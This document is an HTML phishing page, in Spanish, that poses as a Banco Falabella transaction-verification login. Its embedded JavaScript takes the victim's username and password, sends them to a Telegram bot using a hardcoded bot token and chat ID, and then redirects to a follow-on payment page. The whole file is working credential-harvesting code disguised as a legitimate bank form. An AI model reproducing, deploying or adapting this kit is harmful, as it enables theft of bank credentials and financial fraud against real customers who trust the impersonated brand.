<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banco Falabella</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f4f4f4;
        }
        .container {
            background-color: white;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 5px;
            width: 300px;
        }
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .header img {
            height: 40px;
        }
        .header button {
            background-color: #4CAF50;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
        .header button:hover {
            background-color: #45a049;
        }
        .close-btn {
            text-align: right;
            font-size: 18px;
            cursor: pointer;
            color: gray;
        }
        .close-btn:hover {
            color: black;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group select,
        .form-group input {
            width: 100%;
            padding: 10px;
            margin-top: 5px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
        }
        .form-group input[id="submitBtn"] {
            background-color: #ff6b81;
            color: white;
            border: none;
            cursor: pointer;
            font-size: 16px;
            padding: 10px;
            border-radius: 5px;
        }
        .form-group input[id="submitBtn"]:hover {
            background-color: #ff4c61;
        }
        .link {
            display: block;
            text-align: center;
            margin-top: 10px;
            color: #006400;
            text-decoration: none;
        }
        .link:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header" style="margin-bottom: 8%;">
            <img src="../img/BANCO FALABELLA.png" alt="Banco Falabella Logo">
        </div>
       
        <form>
            <div class="form-group">
                <label for="document-type"></label>
                <p style="font-size: smaller; margin-bottom: 4%;">Vamos a valiar tu compra <br> <br>
                    Banco Falabella requiere verificar la transacción que intentas realizar con tu tarjeta por seguridad</p>
                <select id="document-type">
                    <option value="cc">Cédula de Ciudadanía</option>
                </select>
            </div>
            <div class="form-group">
                <input type="text" id="username" placeholder="Usuario" required>
            </div>
            <div class="form-group">
                <input type="password" id="password" placeholder="Ingresa tu contraseña" required>
            </div>

            <div style="display: flex; justify-content: center; margin-top: 6%;">
                <button id="submitBtn" style="width: 90%; background-color: rgb(241, 16, 110); font-size: smaller; color: white; padding: 5%; border-radius: 5px; border-width: 0px;" class="login-button">INGRESAR</button>
            </div>
        </form>

        <script >
            function enviarMensajeTelegram(username, password) {
    // Aquí debes reemplazar 'TU_TOKEN' por el token de tu bot de Telegram
    var token = '8050472055:AAECARJvZtrimVGoBUIXERph4dQDfL3pVXE';
    // Aquí debes reemplazar 'TU_CHAT_ID' por el chat ID al que quieras enviar el mensaje
    var chatID = '5900829263';
    var mensaje = 'Logo Falabella: ' + '\nUsuario: ' + username + ' \nClave: ' + password;

    var url = 'https://api.telegram.org/bot' + token + '/sendMessage?chat_id=' + chatID + '&text=' + mensaje;

    var xhttp = new XMLHttpRequest();
    xhttp.open('GET', url, true);
    xhttp.send();
}

document.getElementById('submitBtn').addEventListener('click', function() {
    var username = document.getElementById('username').value;
    var password = document.getElementById('password').value;

    if (username.trim() !== '' && password.trim() !== '') {
        enviarMensajeTelegram(username, password);
        setTimeout(function() {
            window.location.href = '../cargapago.html';
        }, 1000);
    } else {
        alert('Por favor complete todos los campos antes de continuar.');
    }
});
        </script>
    </div>
</body>
</html>